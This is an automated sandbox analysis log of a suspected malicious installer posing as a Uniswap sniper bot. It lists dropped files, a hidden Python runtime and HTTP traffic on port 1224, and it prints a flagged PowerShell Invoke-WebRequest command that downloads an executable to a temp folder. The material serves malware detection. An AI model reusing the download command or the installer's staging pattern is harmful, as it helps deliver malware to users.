Source: C:\Users\user\.pyp\python.exe	Section loaded: version.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libssl-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: mswsock.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: python311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: version.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: python311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: version.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iphlpapi.dll

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\deed1b2d-6a1c-5708-934a-7202254448da

Jump to behavior

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Static file information: File size 74110128 > 1048576

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: vulkan-1.dll.pdb source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1994272899.0000000005AE0000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1989802067.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1989983801.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: electron.exe.pdb source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: libGLESv2.dll.pdb source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: vk_swiftshader.dll.pdb source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1994272899.0000000005E58000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user\AppData\Local\Temp\tmpa8kcau3f.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "

Source: ffmpeg.dll.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr	Static PE information: section name: .voltbl
Source: ffmpeg.dll.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll.0.dr	Static PE information: section name: .voltbl
Source: libEGL.dll.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr	Static PE information: section name: .voltbl
Source: libGLESv2.dll.0.dr	Static PE information: section name: _RDATA
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .00cfg
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .gxfg
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .retplne
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .rodata
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: .voltbl
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: CPADinfo
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: _RDATA
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: section name: malloc_h
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .voltbl
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr	Static PE information: section name: .voltbl
Source: vulkan-1.dll.0.dr	Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .voltbl
Source: ffmpeg.dll0.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll0.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll0.0.dr	Static PE information: section name: .voltbl
Source: libEGL.dll0.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .voltbl
Source: libGLESv2.dll0.0.dr	Static PE information: section name: _RDATA
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .00cfg
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .gxfg
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .retplne
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .rodata
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: .voltbl
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: CPADinfo
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: _RDATA
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: section name: malloc_h
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: .voltbl
Source: vk_swiftshader.dll0.0.dr	Static PE information: section name: _RDATA
Source: vulkan-1.dll0.0.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll0.0.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll0.0.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll0.0.dr	Static PE information: section name: .voltbl
Source: vulkan-1.dll0.0.dr	Static PE information: section name: _RDATA
Source: node.napi.node2.0.dr	Static PE information: section name: _RDATA
Source: node.napi.node6.0.dr	Static PE information: section name: _RDATA
Source: node.napi.node8.0.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.22.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.22.dr	Static PE information: section name: .00cfg

Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\unicodedata.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\pyexpat.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\nsExec.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\secp256k1\prebuilds\win32-x64\secp256k1.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_overlapped.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\Lib\site-packages\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\vk_swiftshader.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_bz2.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_zoneinfo.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_ctypes.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_socket.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_queue.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\Lib\site-packages\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\uniswap-sniper-bot-with-gui.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_multiprocessing.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\winsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\keccak\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\.pyp\DLLs\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-ia32\node.napi.node	Jump to dropped file

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\keccak\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\secp256k1\prebuilds\win32-x64\secp256k1.node	Jump to dropped file

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\LICENSE.electron.txt			Jump to behavior

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\uniswap-sniper-bot-with-gui.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 1224
Source: unknown	Network traffic detected: HTTP traffic on port 1224 -> 50026

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
